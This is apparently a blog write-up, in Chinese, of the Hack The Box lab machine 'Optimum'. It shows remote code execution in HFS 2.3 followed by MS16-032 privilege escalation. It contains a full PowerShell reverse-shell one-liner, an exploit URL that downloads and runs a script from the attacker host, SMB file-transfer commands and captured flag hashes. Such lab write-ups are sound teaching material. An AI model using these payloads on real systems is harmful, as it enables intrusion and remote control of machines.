[Meachines] [Easy] Optimum HFS文件管理2.3.x-RCE+MS16-0…

2024-09-01 119 0

信息收集

IP Address Opening Ports
10.10.10.8 TCP:80

$ nmap -p- 10.10.10.8 --min-rate 1000 -sC -sV -Pn

PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

HFS 2.3x RCE

[Meachines] [Easy] Optimum HFS文件管理2.3.x-RCE+MS16-0…插图

https://www.exploit-db.com/exploits/39161

[Meachines] [Easy] Optimum HFS文件管理2.3.x-RCE+MS16-0…插图1

但是似乎并不起作用

[Meachines] [Easy] Optimum HFS文件管理2.3.x-RCE+MS16-0…插图2

https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

将内容添加至Invoke-PowerShellTcp.ps1

$client = New-Object System.Net.Sockets.TCPClient('10.10.16.24',10033);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

服务器下载Invoke-PowerShellTcp.ps1自动执行

http://10.10.10.8/?search=%00{.exec|C%3a\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+IEX(New-Object+Net.WebClient).downloadString(%27http%3a//10.10.16.24/Invoke-PowerShellTcp.ps1%27).}

有几次回连的shell会空白,手动停止浏览器访问的URL

[Meachines] [Easy] Optimum HFS文件管理2.3.x-RCE+MS16-0…插图3

User.txt

facdb79de2f4e7f9bac47102e1c8e9b2

权限提升 & MS16-032

开启smb服务端船速文件

$ impacket-smbserver share . -smb2support

[Meachines] [Easy] Optimum HFS文件管理2.3.x-RCE+MS16-0…插图4

https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1

PS C:\Users\Public\Downloads> copy \\10.10.16.24\share\Sherlock.ps1 .

PS C:\Users\Public\Downloads> .\Sherlock.ps1

Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015              
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092                       
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable
                                                    
Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053                     
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems
                                                    
Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081                   
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems
                                                    
Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Appears Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable

https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1

将Invoke-PowerShellTcp.ps1中的反向端口改为10034

[Meachines] [Easy] Optimum HFS文件管理2.3.x-RCE+MS16-0…插图5

PS C:\Users\Public\Downloads> copy \\10.10.16.24\share\Invoke-MS16032.ps1 .

PS C:\Users\Public\Downloads> copy \\10.10.16.24\share\Invoke-PowerShellTcp.ps1 .

PS C:\Users\Public\Downloads> Invoke-MS16032 -Command ".\Invoke-PowerShellTcp.ps1"

[Meachines] [Easy] Optimum HFS文件管理2.3.x-RCE+MS16-0…插图6

附录:

powershell命令:[Environment]::Is64BitProcess 可查看当前系统是否为64位操作系统

Root.txt

98e0c8209346039a2dc629af2297f674


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论